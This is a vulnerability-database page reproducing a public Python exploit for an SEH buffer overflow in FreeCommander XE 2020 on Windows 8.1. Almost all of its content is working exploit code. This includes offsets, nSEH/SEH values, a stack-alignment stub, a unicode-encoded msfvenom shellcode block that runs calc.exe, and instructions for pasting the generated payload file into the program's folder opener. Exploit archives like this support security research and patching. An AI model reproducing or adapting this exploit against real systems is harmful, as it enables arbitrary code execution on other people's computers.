Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FreeCommander XE 2020 Pathname Buffer Overflow Exploit

🗓️ 28 Mar 2020 00:00:00Reported by HodorsecType 
zdt
 zdt🔗 0day.today👁 219 Views

FreeCommander XE 2020 Pathname Buffer Overflow Exploit, Software Link: https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip, Exploits command/folder opener in main window, SEH overflown, Generates TXT file for exploit, Tested on Win8.1 x6

Code
#!/usr/bin/python

# Exploit Title:    FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)
# Version:          Build 810a 32-bit
# Software Link:    https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip
# Exploit Author:   Hodorsec ([email protected] / [email protected])
# Vendor Homepage:  https://www.freecommander.com
# Tested on:        Win8.1 x64 - Build 9600

# Description:      
# - Exploits the command / folder opener in the main window by entering an overly string and pressing enter: a crash will occur and the Structured Exception Handler kicks in (SEH overflown).
# - Some stack alignment was required, which eventually led to the ability of running shellcode.

# Reproduction:
# - Use indicated OS or manipulate settings for stack alignment: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output in the command / folder opener of FreeCommander
# - Check results

# WinDBG initial crash output:
# (db4.648): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - 
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\FreeCommander XE\FreeCommander.exe - 
# eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000
# eip=00410041 esp=00091620 ebp=00091640 iopl=0         nv up ei pl zr na pe nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
# FreeCommander+0x10041:
# 00410041 0064005c        add     byte ptr [eax+eax+5Ch],ah  ds:002b:0000005c=??

import sys, struct

# Filename
filename = "win8_freecommander_poc.txt"

# Maximum length
maxlen = 2000

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "\x00\x0a\x0d" bufferregister=eax
# Payload size: 512 bytes
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlzHTBypkPm0aP2ixep190bDTKnpP0bk0RJl4Kobn44KbRKxjoFW0Jo6p1KODlml1Q3LlBNLKpy1XOLMm1UwgrzR1Br7tKobzp2k0JmlDKNlJq2XySPHzaHQR1bkaImPIqWc2k0In8jCmjMyRknT2kzaZ6maIo4leq6ozmm1i7NX7pPul6JccMzXmk3MKtSEhdnxTKb8ldza6srFBklLPKbkqHMLKQhSbkM4dKIqVp1ymtmTldokokQQaIoj21yoK01OOoPZDKzrxkDM1MaZZa4M55UbM0ipkPr0S8nQRkROu7KOWeukHpTuFB1F2HvFBuWMuMio6umlM6CLZjQpIk7pRUlEWKa7mCsBrO1ZypR3ioxU0cS12LosnNpet80eM0AA"
)

# Offsets
seh = 522
nseh = seh - 2

# Venetian NOP
nop = "\x45"

# Aligning EBP with buffer
# ESP being closest to buffer
# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9b
align_esp = (   "\x54"              # PUSH ESP
                + nop +             # Padding
                "\x58"              # POP EAX
                + nop +             # Padding
                "\x05\x11\x11"      # "\x05\x00\x10\x00\x11" # 0500100011 add eax,0x11001000 --\
                + nop +             # Padding                                                   |--> Adds 0x0f00 bytes
                "\x2d\x02\x11"      # "\x2d\x00\x01\x00\x11" # 2d00010011 sub eax,0x11000100 --/
                + nop +             # Padding
                "\x40"              # INC EAX # Added due to one-off unicode byte
                + nop +             # Padding
                "\x50"              # PUSH EAX
                + nop +             # Padding
                "\xc3"              # RET
)

# Prefix
prefix = "A" * seh                                              # Fill junk
# NSEH/SEH
nseh = "\x41\x45"                                               # NOP --> INC ECX # ADD [EBP], AL
seh = "\x71\x4c"                                                # POP POP RET
# Suffix
suffix = nop * 3                                                # Align
suffix += align_esp                                             # Align registers; EAX for executing shellcode
suffix += nop * 48                                              # Nopping until buffer
suffix += shellcode                                             # Do some magic
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Fill junk

# Concatenate string for payload
payload = prefix + nseh + seh + suffix                          # Put it all together

try:
    file = open(filename,"wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Mar 2020 00:00Current
0.1Low risk
Vulners AI Score0.1
freecommander xe 2020buffer overflowexploitshellcodewin8.1 x64structured exception handlersoftware linkdownloadsmain windowtxt filevulnerabilitymemory corruptionexploit authorvendor homepageaccess violationstack alignmentwordpadwindows machinesecond chance
219